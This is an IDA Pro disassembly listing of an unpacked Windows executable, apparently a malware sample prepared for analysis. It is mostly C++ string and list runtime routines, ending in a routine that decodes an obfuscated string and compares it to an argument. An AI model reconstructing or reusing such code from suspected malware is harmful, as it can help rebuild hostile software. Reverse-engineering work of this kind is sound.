;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	A84A5E11F725D3BB794A8CD429D373BD

; File Name   :	u:\work\a84a5e11f725d3bb794a8cd429d373bd_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 0001D000 ( 118784.)
; Section size in file		: 0001D000 ( 118784.)
; Offset to raw	data for section: 00001000
; Flags	E0000020: Text Executable Readable Writable
; Alignment	: default


unicode		macro page,string,zero
		irpc c,<string>
		db '&c', page
		endm
		ifnb <zero>
		dw zero
		endif
endm

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401000	proc near		; CODE XREF: sub_401141+79p
					; sub_4011D3+25p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_403500
		mov	eax, [ebp+arg_0]
		add	esp, 10h
		pop	ebp
		retn
sub_401000	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40101C	proc near		; CODE XREF: sub_4012AC+50p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40312E
		mov	eax, [ebp+arg_0]
		add	esp, 10h
		pop	ebp
		retn
sub_40101C	endp


; =============== S U B	R O U T	I N E =======================================



sub_401038	proc near		; DATA XREF: jlrllt49:00422F34o
		mov	dword ptr [ecx], offset	off_41E334
		jmp	sub_403258
sub_401038	endp

; ---------------------------------------------------------------------------

loc_401043:				; DATA XREF: jlrllt49:off_41E334o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41E334
		call	sub_403258
		test	byte ptr [esp+8], 1
		jz	short loc_40105F
		push	esi
		call	sub_4034FB
		pop	ecx

loc_40105F:				; CODE XREF: .text:00401056j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_401065	proc near		; CODE XREF: sub_40121E+43p
					; sub_4016BA+43p ...
		push	4
		mov	eax, offset loc_41CDEC
		call	sub_404B8C
		mov	esi, ecx
		mov	[ebp-10h], esi
		call	sub_403189
		and	dword ptr [ebp-4], 0
		push	dword ptr [ebp+8]
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41E340
		call	sub_401111
		mov	eax, esi
		call	sub_404C2B
		retn	4
sub_401065	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40109A	proc near		; CODE XREF: .text:004010C8p
					; .text:004010E7j ...
		push	esi
		mov	esi, ecx
		push	0
		push	1
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41E340
		call	sub_4011D3
		mov	ecx, esi
		pop	esi
		jmp	sub_403258
sub_40109A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4010B7	proc near		; DATA XREF: jlrllt49:0041E344o
					; jlrllt49:0041E350o ...
		cmp	dword ptr [ecx+24h], 10h
		jb	short loc_4010C1
		mov	eax, [ecx+10h]
		retn
; ---------------------------------------------------------------------------

loc_4010C1:				; CODE XREF: sub_4010B7+4j
		lea	eax, [ecx+10h]
		retn
sub_4010B7	endp

; ---------------------------------------------------------------------------

loc_4010C5:				; DATA XREF: jlrllt49:off_41E340o
		push	esi
		mov	esi, ecx
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_4010DB
		push	esi
		call	sub_4034FB
		pop	ecx

loc_4010DB:				; CODE XREF: .text:004010D2j
		mov	eax, esi
		pop	esi
		retn	4
; ---------------------------------------------------------------------------

loc_4010E1:				; DATA XREF: jlrllt49:00422EFCo
		mov	dword ptr [ecx], offset	off_41E34C
		jmp	sub_40109A
; ---------------------------------------------------------------------------

loc_4010EC:				; DATA XREF: jlrllt49:off_41E34Co
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41E34C
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_401108
		push	esi
		call	sub_4034FB
		pop	ecx

loc_401108:				; CODE XREF: .text:004010FFj
		mov	eax, esi
		pop	esi
		retn	4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_401111	proc near		; CODE XREF: sub_401065+26p
					; sub_4013E6+2Bp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, ecx
		push	0
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		push	0FFFFFFFFh
		push	0
		push	[esp+0Ch+arg_0]
		mov	ecx, esi
		call	sub_401141
		mov	eax, esi
		pop	esi
		retn	4
sub_401111	endp

; ---------------------------------------------------------------------------

loc_401137:				; CODE XREF: .text:0041CD8Ej
					; .text:0041CE0Aj ...
		push	0
		push	1
		call	sub_4011D3
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401141	proc near		; CODE XREF: sub_401111+1Bp
					; sub_401547+2Bp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_4]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		cmp	[edi+14h], eax
		mov	ebx, ecx
		jnb	short loc_401159
		call	sub_402C47

loc_401159:				; CODE XREF: sub_401141+11j
		mov	esi, [edi+14h]
		mov	eax, [ebp+arg_4]
		sub	esi, eax
		cmp	[ebp+arg_8], esi
		jnb	short loc_401169
		mov	esi, [ebp+arg_8]

loc_401169:				; CODE XREF: sub_401141+23j
		cmp	ebx, edi
		mov	ecx, ebx
		jnz	short loc_401187
		push	0FFFFFFFFh
		add	esi, eax
		push	esi
		call	sub_4012AC
		push	[ebp+arg_4]
		mov	ecx, ebx
		push	0
		call	sub_4012AC
		jmp	short loc_4011CA
; ---------------------------------------------------------------------------

loc_401187:				; CODE XREF: sub_401141+2Cj
		push	0
		push	esi
		call	sub_401337
		test	al, al
		jz	short loc_4011CA
		cmp	dword ptr [edi+18h], 10h
		jb	short loc_40119E
		mov	edi, [edi+4]
		jmp	short loc_4011A1
; ---------------------------------------------------------------------------

loc_40119E:				; CODE XREF: sub_401141+56j
		add	edi, 4

loc_4011A1:				; CODE XREF: sub_401141+5Bj
		mov	ecx, [ebx+18h]
		cmp	ecx, 10h
		jb	short loc_4011AE
		mov	eax, [ebx+4]
		jmp	short loc_4011B1
; ---------------------------------------------------------------------------

loc_4011AE:				; CODE XREF: sub_401141+66j
		lea	eax, [ebx+4]

loc_4011B1:				; CODE XREF: sub_401141+6Bj
		mov	edx, [ebp+arg_4]
		push	esi
		add	edi, edx
		push	edi
		push	ecx
		push	eax
		call	sub_401000
		add	esp, 10h
		push	esi
		mov	ecx, ebx
		call	sub_40131B

loc_4011CA:				; CODE XREF: sub_401141+44j
					; sub_401141+50j
		pop	edi
		pop	esi
		mov	eax, ebx
		pop	ebx
		pop	ebp
		retn	0Ch
sub_401141	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4011D3	proc near		; CODE XREF: sub_40109A+10p
					; .text:0040113Bp ...

arg_0		= byte ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 0
		push	esi
		mov	esi, ecx
		jz	short loc_401208
		cmp	dword ptr [esi+18h], 10h
		jb	short loc_401208
		cmp	[esp+4+arg_4], 0
		lea	eax, [esi+4]
		push	edi
		mov	edi, [eax]
		jbe	short loc_401200
		push	[esp+8+arg_4]
		push	edi
		push	10h
		push	eax
		call	sub_401000
		add	esp, 10h

loc_401200:				; CODE XREF: sub_4011D3+1Bj
		push	edi
		call	sub_4034FB
		pop	ecx
		pop	edi

loc_401208:				; CODE XREF: sub_4011D3+8j
					; sub_4011D3+Ej
		push	[esp+4+arg_4]
		mov	ecx, esi
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		pop	esi
		retn	8
sub_4011D3	endp


; =============== S U B	R O U T	I N E =======================================



sub_40121E	proc near		; CODE XREF: sub_41C75B+4Ap
		push	44h
		mov	eax, offset loc_41CEB7
		call	sub_404B8C
		push	dword ptr [ebp+10h]
		mov	esi, [ebp+0Ch]
		push	dword ptr [esi+4]
		push	esi
		call	sub_401395
		mov	ecx, 0FC0FC0h
		sub	ecx, dword_437684
		cmp	ecx, 1
		jnb	short loc_40127B
		push	offset aListTTooLong ; "list<T>	too long"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_422EF8
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41E34C
		call	sub_40477B

loc_40127B:				; CODE XREF: sub_40121E+29j
		inc	dword_437684
		mov	[esi+4], eax
		mov	ecx, [eax+4]
		mov	[ecx], eax
		call	sub_404C2B
		retn	0Ch
sub_40121E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401291	proc near		; CODE XREF: .text:loc_41CFDBp
		push	10Ch
		call	sub_4035D9
		test	eax, eax
		pop	ecx
		jz	short loc_4012A2
		mov	[eax], eax

loc_4012A2:				; CODE XREF: sub_401291+Dj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short locret_4012AB
		mov	[ecx], eax

locret_4012AB:				; CODE XREF: sub_401291+16j
		retn
sub_401291	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4012AC	proc near		; CODE XREF: sub_401141+33p
					; sub_401141+3Fp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		mov	esi, ecx
		cmp	[esi+14h], edi
		jnb	short loc_4012C0
		call	sub_402C47

loc_4012C0:				; CODE XREF: sub_4012AC+Dj
		mov	eax, [esi+14h]
		sub	eax, edi
		cmp	eax, [ebp+arg_4]
		jnb	short loc_4012CD
		mov	[ebp+arg_4], eax

loc_4012CD:				; CODE XREF: sub_4012AC+1Cj
		cmp	[ebp+arg_4], 0
		jbe	short loc_401313
		mov	ecx, [esi+18h]
		cmp	ecx, 10h
		push	ebx
		lea	edx, [esi+4]
		jb	short loc_4012E3
		mov	ebx, [edx]
		jmp	short loc_4012E5
; ---------------------------------------------------------------------------

loc_4012E3:				; CODE XREF: sub_4012AC+31j
		mov	ebx, edx

loc_4012E5:				; CODE XREF: sub_4012AC+35j
		cmp	ecx, 10h
		jb	short loc_4012EC
		mov	edx, [edx]

loc_4012EC:				; CODE XREF: sub_4012AC+3Cj
		sub	eax, [ebp+arg_4]
		add	ebx, edi
		add	ebx, [ebp+arg_4]
		push	eax
		push	ebx
		sub	ecx, edi
		push	ecx
		add	edx, edi
		push	edx
		call	sub_40101C
		mov	eax, [esi+14h]
		sub	eax, [ebp+arg_4]
		add	esp, 10h
		push	eax
		mov	ecx, esi
		call	sub_40131B
		pop	ebx

loc_401313:				; CODE XREF: sub_4012AC+25j
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebp
		retn	8
sub_4012AC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40131B	proc near		; CODE XREF: sub_401111+Cp
					; sub_401141+84p ...

arg_0		= dword	ptr  4

		cmp	dword ptr [ecx+18h], 10h
		mov	eax, [esp+arg_0]
		mov	[ecx+14h], eax
		jb	short loc_40132D
		mov	ecx, [ecx+4]
		jmp	short loc_401330
; ---------------------------------------------------------------------------

loc_40132D:				; CODE XREF: sub_40131B+Bj
		add	ecx, 4

loc_401330:				; CODE XREF: sub_40131B+10j
		mov	byte ptr [ecx+eax], 0
		retn	4
sub_40131B	endp


; =============== S U B	R O U T	I N E =======================================



sub_401337	proc near		; CODE XREF: sub_401141+49p
					; sub_401547+39p

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

		push	esi
		push	edi
		mov	edi, [esp+8+arg_0]
		cmp	edi, 0FFFFFFFEh
		mov	esi, ecx
		jbe	short loc_401349
		call	sub_402C08

loc_401349:				; CODE XREF: sub_401337+Bj
		cmp	[esi+18h], edi
		jnb	short loc_40135B

loc_40134E:				; DATA XREF: sub_4900D7+26Fr
		push	dword ptr [esi+14h]
		mov	ecx, esi
		push	edi
		call	sub_401442
		jmp	short loc_401388
; ---------------------------------------------------------------------------

loc_40135B:				; CODE XREF: sub_401337+15j
		cmp	[esp+8+arg_4], 0
		jz	short loc_40137C
		cmp	edi, 10h
		jnb	short loc_40137C
		mov	eax, [esi+14h]
		cmp	edi, eax
		jnb	short loc_401370
		mov	eax, edi

loc_401370:				; CODE XREF: sub_401337+35j
		push	eax
		push	1
		mov	ecx, esi
		call	sub_4011D3
		jmp	short loc_401388
; ---------------------------------------------------------------------------

loc_40137C:				; CODE XREF: sub_401337+29j
					; sub_401337+2Ej
		test	edi, edi
		jnz	short loc_401388
		push	edi
		mov	ecx, esi
		call	sub_40131B

loc_401388:				; CODE XREF: sub_401337+22j
					; sub_401337+43j ...
		xor	eax, eax
		cmp	eax, edi
		sbb	eax, eax
		pop	edi
		neg	eax
		pop	esi
		retn	8
sub_401337	endp


; =============== S U B	R O U T	I N E =======================================



sub_401395	proc near		; CODE XREF: sub_40121E+16p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	10Ch
		call	sub_4035D9
		test	eax, eax
		pop	ecx
		jz	short loc_4013AA
		mov	ecx, [esp+arg_0]
		mov	[eax], ecx

loc_4013AA:				; CODE XREF: sub_401395+Dj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short loc_4013B7
		mov	edx, [esp+arg_4]
		mov	[ecx], edx

loc_4013B7:				; CODE XREF: sub_401395+1Aj
		push	edi
		lea	edi, [eax+8]
		test	edi, edi
		jz	short loc_4013CA
		push	esi
		mov	esi, [esp+8+arg_8]
		push	41h
		pop	ecx
		rep movsd
		pop	esi

loc_4013CA:				; CODE XREF: sub_401395+28j
		pop	edi
		retn	0Ch
sub_401395	endp

; ---------------------------------------------------------------------------
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_4013E6
		mov	dword ptr [esi], offset	off_41E34C
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_4013E6	proc near		; CODE XREF: .text:004013D5p
					; sub_402C47+46p
		push	4
		mov	eax, offset loc_41CDEC
		call	sub_404B8C
		mov	esi, ecx
		mov	[ebp-10h], esi
		mov	edi, [ebp+8]
		push	edi
		call	sub_403200
		and	dword ptr [ebp-4], 0
		add	edi, 0Ch
		push	edi
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41E340
		call	sub_401111
		mov	eax, esi
		call	sub_404C2B
		retn	4
sub_4013E6	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401420	proc near		; CODE XREF: sub_40121E+33p
					; sub_4016BA+33p ...

arg_0		= dword	ptr  4

		push	esi
		mov	esi, ecx
		push	0
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		push	[esp+4+arg_0]
		mov	ecx, esi
		call	sub_401524
		mov	eax, esi
		pop	esi
		retn	4
sub_401420	endp


; =============== S U B	R O U T	I N E =======================================



sub_401442	proc near		; CODE XREF: sub_401337+1Dp
		push	0Ch
		mov	eax, offset sub_41CDC9
		call	sub_404BBF
		mov	edi, ecx
		mov	[ebp-18h], edi
		mov	esi, [ebp+8]
		or	esi, 0Fh
		cmp	esi, 0FFFFFFFEh
		jbe	short loc_401463
		mov	esi, [ebp+8]
		jmp	short loc_401488
; ---------------------------------------------------------------------------

loc_401463:				; CODE XREF: sub_401442+1Aj
		xor	edx, edx
		push	3
		mov	eax, esi
		pop	ebx
		div	ebx
		mov	ecx, [edi+18h]
		mov	[ebp-14h], ecx
		shr	dword ptr [ebp-14h], 1
		mov	edx, [ebp-14h]
		cmp	eax, edx
		jnb	short loc_401488
		push	0FFFFFFFEh
		pop	eax
		sub	eax, edx
		cmp	ecx, eax
		ja	short loc_401488
		lea	esi, [edx+ecx]

loc_401488:				; CODE XREF: sub_401442+1Fj
					; sub_401442+38j ...
		and	dword ptr [ebp-4], 0
		lea	eax, [esi+1]
		push	0
		push	eax
		call	sub_4015ED
		pop	ecx
		pop	ecx
		mov	ebx, eax
		jmp	short loc_4014C7
; ---------------------------------------------------------------------------
byte_40149D	db 8Bh,	45h		; DATA XREF: jlrllt49:0042302Co
dword_40149F	dd 0F0658908h		; DATA XREF: sub_4900D7+20Fr
					; p9xindpz:00490808r ...
; ---------------------------------------------------------------------------
		mov	[ebp+8], eax
		inc	eax
		push	0

loc_4014A9:				; DATA XREF: sub_4900D7+A1r
		push	eax
		mov	byte ptr [ebp-4], 2
		call	sub_4015ED
		pop	ecx
		mov	[ebp-14h], eax
		pop	ecx
		mov	eax, offset loc_4014BE
		retn
; ---------------------------------------------------------------------------

loc_4014BE:				; DATA XREF: sub_401442+76o
		mov	edi, [ebp-18h]
		mov	esi, [ebp+8]
		mov	ebx, [ebp-14h]

loc_4014C7:				; CODE XREF: sub_401442+59j
		cmp	dword ptr [ebp+0Ch], 0
		jbe	short loc_4014EC
		cmp	dword ptr [edi+18h], 10h
		jb	short loc_4014D8
		mov	eax, [edi+4]
		jmp	short loc_4014DB
; ---------------------------------------------------------------------------

loc_4014D8:				; CODE XREF: sub_401442+8Fj
		lea	eax, [edi+4]

loc_4014DB:				; CODE XREF: sub_401442+94j
		push	dword ptr [ebp+0Ch]
		push	eax
		lea	eax, [esi+1]
		push	eax
		push	ebx
		call	sub_401000
		add	esp, 10h

loc_4014EC:				; CODE XREF: sub_401442+89j
		push	0
		push	1
		mov	ecx, edi
		call	sub_4011D3
		push	dword ptr [ebp+0Ch]
		mov	ecx, edi
		mov	[edi+4], ebx
		mov	[edi+18h], esi
		call	sub_40131B
		call	sub_404C2B
		retn	8
sub_401442	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40150F	proc near		; DATA XREF: jlrllt49:0042301Co
		mov	ecx, [ebp-18h]
		xor	esi, esi
		push	esi
		push	1
		call	sub_4011D3
		push	esi
		push	esi
		call	sub_40477B
		int	3		; Trap to Debugger
sub_40150F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401524	proc near		; CODE XREF: sub_401420+17p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		mov	esi, ecx
		lea	edx, [eax+1]

loc_40152E:				; CODE XREF: sub_401524+Fj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_40152E
		sub	eax, edx
		push	eax
		push	[esp+8+arg_0]
		mov	ecx, esi
		call	sub_401547
		pop	esi
		retn	4
sub_401524	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401547	proc near		; CODE XREF: sub_401524+1Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		push	edi
		mov	esi, ecx
		call	sub_4015B9
		test	al, al
		jz	short loc_401579
		cmp	dword ptr [esi+18h], 10h
		jb	short loc_401566
		mov	eax, [esi+4]
		jmp	short loc_401569
; ---------------------------------------------------------------------------

loc_401566:				; CODE XREF: sub_401547+18j
		lea	eax, [esi+4]

loc_401569:				; CODE XREF: sub_401547+1Dj
		push	[ebp+arg_4]
		sub	edi, eax
		push	edi
		push	esi
		mov	ecx, esi
		call	sub_401141
		jmp	short loc_4015B3
; ---------------------------------------------------------------------------

loc_401579:				; CODE XREF: sub_401547+12j
		push	0
		push	[ebp+arg_4]
		mov	ecx, esi
		call	sub_401337
		test	al, al
		jz	short loc_4015B1
		mov	ecx, [esi+18h]
		cmp	ecx, 10h
		jb	short loc_401596
		mov	eax, [esi+4]
		jmp	short loc_401599
; ---------------------------------------------------------------------------

loc_401596:				; CODE XREF: sub_401547+48j
		lea	eax, [esi+4]

loc_401599:				; CODE XREF: sub_401547+4Dj
		push	[ebp+arg_4]
		push	edi
		push	ecx
		push	eax
		call	sub_401000
		add	esp, 10h
		push	[ebp+arg_4]
		mov	ecx, esi
		call	sub_40131B

loc_4015B1:				; CODE XREF: sub_401547+40j
		mov	eax, esi

loc_4015B3:				; CODE XREF: sub_401547+30j
		pop	edi
		pop	esi
		pop	ebp
		retn	8
sub_401547	endp


; =============== S U B	R O U T	I N E =======================================



sub_4015B9	proc near		; CODE XREF: sub_401547+Bp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [ecx+18h]
		cmp	esi, 10h
		lea	eax, [ecx+4]
		jb	short loc_4015C9
		mov	edx, [eax]
		jmp	short loc_4015CB
; ---------------------------------------------------------------------------

loc_4015C9:				; CODE XREF: sub_4015B9+Aj
		mov	edx, eax

loc_4015CB:				; CODE XREF: sub_4015B9+Ej
		cmp	[esp+4+arg_0], edx
		jb	short loc_4015E7
		cmp	esi, 10h
		jb	short loc_4015D8
		mov	eax, [eax]

loc_4015D8:				; CODE XREF: sub_4015B9+1Bj
		mov	ecx, [ecx+14h]
		add	ecx, eax
		cmp	ecx, [esp+4+arg_0]
		jbe	short loc_4015E7
		mov	al, 1
		jmp	short loc_4015E9
; ---------------------------------------------------------------------------

loc_4015E7:				; CODE XREF: sub_4015B9+16j
					; sub_4015B9+28j
		xor	al, al

loc_4015E9:				; CODE XREF: sub_4015B9+2Cj
		pop	esi
		retn	4
sub_4015B9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4015ED	proc near		; CODE XREF: sub_401442+50p
					; sub_401442+6Cp

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	ecx, [ebp+arg_0]
		sub	esp, 0Ch
		test	ecx, ecx
		ja	short loc_401605
		xor	ecx, ecx

loc_4015FC:				; CODE XREF: sub_4015ED+22j
		push	ecx
		call	sub_4035D9
		pop	ecx
		leave
		retn
; ---------------------------------------------------------------------------

loc_401605:				; CODE XREF: sub_4015ED+Bj
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ecx
		cmp	eax, 1
		jnb	short loc_4015FC
		and	[ebp+arg_0], 0
		lea	eax, [ebp+arg_0]
		push	eax
		lea	ecx, [ebp+var_C]
		call	sub_40319A
		push	offset dword_422F30
		lea	eax, [ebp+var_C]
		push	eax
		mov	[ebp+var_C], offset off_41E334
		call	sub_40477B
		int	3		; Trap to Debugger
		push	esi
		push	[esp+10h+var_8]
		mov	esi, ecx
		call	sub_403200
		mov	dword ptr [esi], offset	off_41E334
		mov	eax, esi
		pop	esi
		retn	4
sub_4015ED	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40164F	proc near		; CODE XREF: sub_401EF9+FFp
					; sub_402086+4Ep ...
		cmp	dword ptr [esi], 0
		jnz	short loc_401659
		call	sub_4034EB

loc_401659:				; CODE XREF: sub_40164F+3j
		mov	eax, [esi]
		mov	ecx, [esi+4]
		cmp	ecx, [eax+4]
		jnz	short loc_401668
		call	sub_4034EB

loc_401668:				; CODE XREF: sub_40164F+12j
		mov	eax, [esi+4]
		add	eax, 8
		retn
sub_40164F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40166F	proc near		; CODE XREF: sub_401EF9+11Ap
					; sub_402086+69p ...
		cmp	dword ptr [esi], 0
		mov	eax, [esi]
		mov	[edi], eax
		mov	eax, [esi+4]
		mov	[edi+4], eax
		jnz	short loc_401683
		call	sub_4034EB

loc_401683:				; CODE XREF: sub_40166F+Dj
		mov	eax, [esi]
		mov	ecx, [esi+4]
		cmp	ecx, [eax+4]
		jnz	short loc_401692
		call	sub_4034EB

loc_401692:				; CODE XREF: sub_40166F+1Cj
		mov	eax, [esi+4]
		mov	eax, [eax]
		mov	[esi+4], eax
		mov	eax, edi
		retn
sub_40166F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40169D	proc near		; CODE XREF: sub_401EF9+F1p
					; sub_402086+40p ...
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_4016A7
		cmp	eax, [edi]
		jz	short loc_4016AC

loc_4016A7:				; CODE XREF: sub_40169D+4j
		call	sub_4034EB

loc_4016AC:				; CODE XREF: sub_40169D+8j
		mov	eax, [esi+4]
		xor	ecx, ecx
		cmp	eax, [edi+4]
		setnz	cl
		mov	al, cl
		retn
sub_40169D	endp


; =============== S U B	R O U T	I N E =======================================



sub_4016BA	proc near		; CODE XREF: sub_414D0E+54p
		push	48h
		mov	eax, offset loc_41CE0F
		call	sub_404B8C
		push	dword ptr [ebp+8]
		mov	esi, [ebp+10h]
		push	dword ptr [esi+4]
		push	esi
		call	sub_401745
		mov	ecx, 3C3C3C3h
		sub	ecx, dword_437690
		cmp	ecx, 1
		jnb	short loc_401717
		push	offset aListTTooLong ; "list<T>	too long"
		lea	ecx, [ebp-2Ch]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-2Ch]
		push	eax
		lea	ecx, [ebp-54h]
		call	sub_401065
		push	offset dword_422EF8
		lea	eax, [ebp-54h]
		push	eax
		mov	dword ptr [ebp-54h], offset off_41E34C
		call	sub_40477B

loc_401717:				; CODE XREF: sub_4016BA+29j
		inc	dword_437690
		mov	[esi+4], eax
		mov	ecx, [eax+4]
		mov	[ecx], eax
		call	sub_404C2B
		retn	0Ch
sub_4016BA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40172D	proc near		; CODE XREF: .text:loc_41CFF8p
		push	4Ch
		call	sub_4035D9
		test	eax, eax
		pop	ecx
		jz	short loc_40173B
		mov	[eax], eax

loc_40173B:				; CODE XREF: sub_40172D+Aj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short locret_401744
		mov	[ecx], eax

locret_401744:				; CODE XREF: sub_40172D+13j
		retn
sub_40172D	endp


; =============== S U B	R O U T	I N E =======================================



sub_401745	proc near		; CODE XREF: sub_4016BA+16p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	4Ch
		call	sub_4035D9
		test	eax, eax
		pop	ecx
		jz	short loc_401757
		mov	ecx, [esp+arg_0]
		mov	[eax], ecx

loc_401757:				; CODE XREF: sub_401745+Aj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short loc_401764
		mov	edx, [esp+arg_4]
		mov	[ecx], edx

loc_401764:				; CODE XREF: sub_401745+17j
		push	edi
		lea	edi, [eax+8]
		test	edi, edi
		jz	short loc_401777
		push	esi
		mov	esi, [esp+8+arg_8]
		push	11h
		pop	ecx
		rep movsd
		pop	esi

loc_401777:				; CODE XREF: sub_401745+25j
		pop	edi
		retn	0Ch
sub_401745	endp


; =============== S U B	R O U T	I N E =======================================



sub_40177B	proc near		; DATA XREF: jlrllt49:off_421C88o
		push	4B8h
		mov	eax, offset loc_41CFB3

loc_401785:				; DATA XREF: p9xindpz:00490350o
		call	sub_404BF5
		cmp	dword ptr [ebp+1Ch], 3
		mov	eax, [ebp+10h]
		mov	edi, [ebp+20h]
		mov	[ebp-4C4h], eax
		mov	eax, [ebp+18h]
		mov	[ebp-4BCh], eax
		mov	[ebp-4C0h], edi
		jl	loc_4019D5
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp-18Fh]
		push	ebx
		push	eax
		mov	[ebp-190h], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp-0CFh]
		push	ebx
		push	eax
		mov	[ebp-0D0h], bl
		call	sub_408130
		push	dword ptr [edi+4]
		lea	edi, [ebp-190h]
		call	sub_41C1B3
		push	0C0h
		lea	esi, [ebp-0D0h]
		mov	ebx, offset aEvZgEGGeAeeGgZ ; "Хاեңأؠգקԣӣ"...
		call	sub_41A33D
		add	esp, 20h
		cmp	byte ptr [ebp+8], 0
		jz	short loc_401817
		cmp	byte_42740A, 0
		jz	loc_4019EB

loc_401817:				; CODE XREF: sub_40177B+8Dj
		lea	ecx, [ebp-0D0h]
		lea	eax, [ebp-190h]

loc_401823:				; CODE XREF: sub_40177B+C0j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_401841
		test	dl, dl
		jz	short loc_40183D
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_401841
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_401823

loc_40183D:				; CODE XREF: sub_40177B+B0j
		xor	eax, eax
		jmp	short loc_401846
; ---------------------------------------------------------------------------

loc_401841:				; CODE XREF: sub_40177B+ACj
					; sub_40177B+B8j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

